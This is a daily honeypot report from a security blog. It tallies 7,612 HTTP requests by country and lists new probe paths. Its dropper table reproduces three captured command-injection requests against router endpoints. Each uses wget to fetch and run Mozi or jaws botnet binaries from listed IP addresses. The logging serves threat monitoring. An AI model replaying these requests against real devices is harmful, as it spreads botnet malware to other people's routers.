Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-04-22

·410 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-22
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 27 new requests that have never been observed before (these were added to the monitored request database.).

A total of 7612 requests were recorded during the day, originating from 3 different countries, with a peak of 6185 requests coming from SC.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
104.42.213.46GET /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo HTTP/1.1
122.97.138.10227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
45.230.66.35GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.35:11827/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
774POST /any HTTP/1.1
912\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
6781GET /services/php.ini HTTP/1.1
10561GET /lms/dashboard/phpinfo.php HTTP/1.1
14521GET /live/lara/info.php HTTP/1.1
19621GET /wp-content/themes/secrets.json HTTP/1.1
21001\x00\x0E8\xC4\xEDv\xAC\xDA*\xC6\xEA\x00\x00\x00\x00\x00
21091\x00\x0E8\xEAHl\x0B\x9Cn\xFD\x96\x00\x00\x00\x00\x00
21111POST /api/user/binLookup?time=1745327114955715816 HTTP/1.1
21121GET /api/bin/440393?time=1745327114544332482 HTTP/1.1
21131GET /config/index?time=1745326096726238592 HTTP/1.1
21241\x00\x0E8O\xDB\xE0\x17\xC3D\x13\xB4\x00\x00\x00\x00\x00
21331\x00\x0E8\xAE1\xC9\x9AR\xDC\xC3\xAF\x00\x00\x00\x00\x00
21341\x00\x0E\x08\xAE1\xC9\x9AR\xDC\xC3\xAF\x00\x00\x00\x00\x00
21371\x00\x0E8R\x99\xFA FB%\x7F\x00\x00\x00\x00\x00
21391POST /api/user/binLookup?time=1745327064178202500 HTTP/1.1
21401GET /api/bin/440393?time=1745327063763103530 HTTP/1.1
21411GET /config/index?time=1745326058542704505 HTTP/1.1
21571\x00\x0E8dx8\x13\xA9\xB7\xB8\xD6\x00\x00\x00\x00\x00
21761\x00\x0E8\xA6M\x1D\x18\x09%\xBC6\x00\x00\x00\x00\x00
21801POST /api/user/binLookup?time=1745327682039014809 HTTP/1.1
21811GET /api/bin/440393?time=1745327681535733245 HTTP/1.1
21821GET /config/index?time=1745326516575261339 HTTP/1.1
21861\x00\x0E\x08 \x03Qd>\xEF\xEE\xF7\x00\x00\x00\x00\x00
21871\x00\x0E8 \x03Qd>\xEF\xEE\xF7\x00\x00\x00\x00\x00
42041POST /CGI/Execute HTTP/1.1
50871GET /client/lara/info.php HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
06185SC
1321GB
2277US
3164NL
4116CN
591PL
669HK
757DE
856CA
947SG
1047JP
1128AU
1226KR
1315UA
1414AO
1510HR
1610GH
178IL
187TW
197FR
206PT
215BE
225RU
234BR
244BG
253NG
263IN
273MC
282TH
292TR
302AR
312IE
322GE
332CZ
342ES
352HU
362IT
371NZ
381EE
391AZ
401MK
411HN
421ID

Related

Report: 2025-04-21
·30388 words
Repport Daily
Report: 2025-04-20
·504 words
Repport Daily
Report: 2025-04-19
·395 words
Repport Daily